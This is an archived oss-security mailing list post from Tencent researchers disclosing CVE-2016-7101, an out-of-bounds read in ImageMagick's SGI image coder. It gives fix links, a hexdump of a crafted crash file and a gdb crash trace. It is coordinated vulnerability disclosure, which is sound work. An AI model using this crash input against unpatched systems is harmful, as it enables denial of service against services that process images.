Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Mon, 26 Sep 2016 07:54:24 +0000
From: pwchen(陈佩文) <pwchen@...cent.com>
To: oss-security <oss-security@...ts.openwall.com>
Subject: CVE-2016-7101 - ImageMagick SGI Coder Out-Of-Bounds Read
 Vulnerability

Hi.

This is PeiwenChen of Tencent's Xuanwu Lab & RayZhong of Tencent's Keen Lab.
During our research, we found an Out-Of-Bounds write vulnerability in
 ImageMagick's SGI coder.

When ImageMagick is identifying SGI format image, we can craft a sgi file
with big value of row. It will read a certain number of times which is
controllable by value of row, It cause an Out-Of-Bounds Read.

The ImageMagick team has fixed the vulnerability we reported.


Upstream fix:
https://github.com/ImageMagick/ImageMagick/commit/7afcf9f71043df15508e46f079387bd4689a738d
https://github.com/ImageMagick/ImageMagick/commit/8f8959033e4e59418d6506b345829af1f7a71127

Debian Bug report:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=836776


Attached is a proof of concept and backtrace.

$ hexdump PoC.sgi
0000000 da01 0100 0000 fffe 0200 0400
000000c

$ convert PoC.sgi


Program received signal SIGSEGV, Segmentation fault.
[------------------------registers------------------------]
RAX: 0x0
RBX: 0x1
RCX: 0xf939
RDX: 0x6031b0 --> 0x0
RSI: 0x7ffff7fe8090 --> 0x1
RDI: 0x7ffff7dcef98 --> 0x1
RBP: 0xdfbc
RSP: 0x7fffffff5e60 --> 0xffffffff54535254
RIP: 0x7ffff74eae8b (<IdentifyImageGray+795>: movss  xmm0,DWORD PTR [r15+rax*4])
R8 : 0x744850 --> 0x0
R9 : 0x1
R10: 0x69a000 --> 0x0
R11: 0x1
R12: 0x641600 --> 0x600000000
R13: 0x6535f0 --> 0x1700000001
R14: 0x603178 --> 0x6031b0 --> 0x0

R15: 0x765000                          <== end address of heap

[---------------------------code---------------------------]
   0x7ffff74eae7d <IdentifyImageGray+781>: inc    BYTE PTR [rdx+rcx*1]
   0x7ffff74eae80 <IdentifyImageGray+784>: mov    DWORD PTR [rax],0x5177
   0x7ffff74eae86 <IdentifyImageGray+790>: mov    rax,QWORD PTR [rsp+0x30]
=> 0x7ffff74eae8b <IdentifyImageGray+795>: movss  xmm0,DWORD PTR [r15+rax*4]
   0x7ffff74eae91 <IdentifyImageGray+801>: movaps XMMWORD PTR [rsp+0x40],xmm0
   0x7ffff74eae96 <IdentifyImageGray+806>: mov    rax,QWORD PTR [rsp+0x28]
   0x7ffff74eae9b <IdentifyImageGray+811>: movss  xmm4,DWORD PTR [r15+rax*4]
   0x7ffff74eaea1 <IdentifyImageGray+817>: subss  xmm0,xmm4
[---------------------------stack---------------------------]
00:0000| rsp 0x7fffffff5e60 --> 0xffffffff54535254
01:0008|     0x7fffffff5e68 --> 0x0
02:0016|     0x7fffffff5e70 --> 0x63d600 --> 0x6535f0 --> 0x1700000001
03:0024|     0x7fffffff5e78 --> 0x614160 --> 0x1a9
04:0032|     0x7fffffff5e80 --> 0x0
05:0040|     0x7fffffff5e88 --> 0x1
06:0048|     0x7fffffff5e90 --> 0x0
07:0056|     0x7fffffff5e98 --> 0xfeff
[-----------------------------------------------------------]
Legend: stack, code, data, heap, rodata, value
Stopped reason: SIGSEGV
0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at ./MagickCore/pixel-accessor.h:561
561   red_green=(MagickRealType) pixel[image->channel_map[RedPixelChannel].offset]-

gdb-peda$ bt
#0  0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at ./MagickCore/pixel-accessor.h:561
#1  IdentifyImageGray (image=<optimized out>, exception=<optimized out>) at MagickCore/attribute.c:683
#2  0x00007ffff74ebb7a in IdentifyImageType (image=0x6535f0, exception=0x614160) at MagickCore/attribute.c:821
#3  0x00007ffff7647d39 in IdentifyImage (image=0x6535f0, file=<optimized out>, verbose=<optimized out>, exception=0x614160) at MagickCore/identify.c:494
#4  0x00007ffff71024a6 in IdentifyImageCommand (image_info=<optimized out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, exception=<optimized out>) at MagickWand/identify.c:336
#5  0x00007ffff7153e53 in MagickCommandGenesis (image_info=<optimized out>, command=<optimized out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, exception=<optimized out>) at MagickWand/mogrify.c:183
#6  0x0000000000401cae in MagickMain (argc=<optimized out>, argv=<optimized out>) at utilities/magick.c:145
#7  main (argc=<optimized out>, argv=<optimized out>, argv@...ry=0x7fffffffeb48) at utilities/magick.c:176
#8  0x00007ffff5a3b830 in __libc_start_main (main=0x4015f0 <main>, argc=0x2, argv=0x7fffffffeb48, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffeb38) at ../csu/libc-start.c:291
#9  0x0000000000401519 in _start ()


gdb-peda$ vmmap
Start              End                Perm Name
0x00400000         0x00403000         r-xp /usr/local/bin/magick
0x00602000         0x00603000         r--p /usr/local/bin/magick
0x00603000         0x00604000         rw-p /usr/local/bin/magick
0x00604000         0x00765000         rw-p [heap]
0x00007ffff553f000 0x00007ffff5817000 r--p /usr/lib/locale/locale-archive


Regards,
Peiwen Chen
Tencent's Xuanwu Lab

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.